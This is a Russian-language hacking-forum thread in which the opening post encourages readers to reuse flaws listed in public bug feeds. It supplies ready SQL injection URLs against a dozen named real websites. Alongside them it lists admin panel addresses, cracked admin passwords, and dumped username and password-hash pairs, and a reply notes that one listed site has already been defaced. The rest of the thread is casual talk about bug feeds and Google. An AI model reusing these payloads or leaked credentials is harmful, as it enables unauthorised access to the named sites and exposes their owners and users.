Не знаю чего меня на них занесло, но не в этом суть... В этом маленьком обзоре я хотел бы донести до Вас только одну мысль - посещайте почаще bugtrack's (багтраки). Для начала дадим малюсенькое определение, bugtrack - это система учета багов... Другими словами это новостная лента новых багов, уязвимостей, дырок etc... Зачем посещать их? Затем чтоб не искать одни и те же уязвимости которые нашли уже до вас... Примеры подобных лент: 1) http://www.xakep.ru/articles/hack/bugtrack.asp 2) http://www.securitylab.ru/vulnerability/ 3) http://securityvulns.ru/ Это одни из известных лент конечно же... Вообще-то не хотел писать весь этот бред, просто хотел показать на сколько полезно читать подобные ленты. 1) http://www.securitylab.ru/vulnerability/299772.php & http://xakep.ru/post/39307/default.asp Примеры: Код: http://www.faithmeadow.com/store/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1 Админка: http://www.faithmeadow.com/store/admin/ Пароль на админку: likelight5 Код: http://spanglishtees.com/store/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1 Админка: http://spanglishtees.com/store/admin/ Пароль на админку: spanglish44 Код: http://www.mamohowell.com/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1 Админка: http://www.mamohowell.com/admin/ Пароль на админку: lahela Код: http://www.dressesonline.com/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1 Админка: http://www.dressesonline.com/admin/ Пароль на админку: Francischan_2 Код: http://www.spci.com/tuckalumni/insertorder.cfm?CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15%20from%20%20params"having%201=1 Админка: http://www.spci.com/tuckalumni/admin/ Пароль на админку: n0rwich 2) http://www.securitylab.ru/vulnerability/299834.php & http://xakep.ru/post/39306/default.asp Примеры: Код: http://vmsis.net/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/* Admin:5bbff116aa528d68994894ed16eeac0d Код: http://rodpart.ru/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/* Admin:3a69fddd42f4555e7d0f279eb5c5d8f4(12221390) Код: http://www.steinkopf.ru/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/* Nobody:978a54a0d702a50a5bc052e5f134c207 Код: http://www.sba.unifi.it/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/* Admin:7ebdff82d5cd0e6264d4e7c30af2d513 (piratato) Код: http://www.creatina.com/temp/mdpro/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/* tin:41cacd3c5ff0351143f5d6406b7fa411 Код: http://www.borgoclub.com/portal/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/* Webmaster:791a47420ed8e214ee40aa2296971d86 (vofataso) Код: http://www.mecori.com/index.php?module=Topics&func=view&topicid=-1%20UNION%20ALL%20SELECT%20null,null,concat(pn_uname,0x3a,pn_pass),null,null,null,null%20from%20md_users%20where%20pn_uid=2/* emmanuel:73653fb5e1e0fbf4ab772fdc9ef437fe [end] Да-да...я понимаю...что настоящий тру хеккер ищет все уязвимости сам, но не за чем так напрягаться когда эти самые уязвимости успели найти до вас...не изобретайте велосипед... Удачного хека... (с) Koller
Koller, Да, Гугл и Багтраки рулили, и будут рулить Только вот последнее время, времени вообще нету, ни на что. Ни на форумы, ни на Багтраки. Нет, это не бред
На счет того, будет ли эта связка (гугл + багтрак) рулить в будущем не уверен...потому что времена веб-уязвимостей плавно переходит на нет...разработчики поумнели...ошибок намного меньше стали допускать... Так что поживем, увидем... А на счет бреда я так выразился только потому, что не хотел писать мини-"статью", а просто хотел показать на сколько багтраки упрощают процесс взлома... Вот Добавлено через 6 часов 42 минуты Мда... http://www.faithmeadow.com уже взломали какие-то коммунисты... Посмотрим как долго другие сайты продержутся...
Статья очень полезная, багтраки всегда будут, щас количество уменьшается, но опять возрастет, так как технологии инета постепенно меняются. Вот насчёт гугла не уверен, его наверняка уже давно закрыть хотят. Уже много в инете статей о том что гугл помогает хакерам.
Ну начнем с того, что это не статья вовсе...а так...небольшой очерк... На счет того, будут ли багтраки всегда...спорный вопрос...быть может, в скором будущем буду закрыты все паблик ленты подобного рода...ведь и этого исключать нельзя... А гугл тут вовсе не причём...и его не за что закрывать...за то, что он умеет находить именно то, что юзер ищет?...посему гугл будет еще долго существовать я думаю...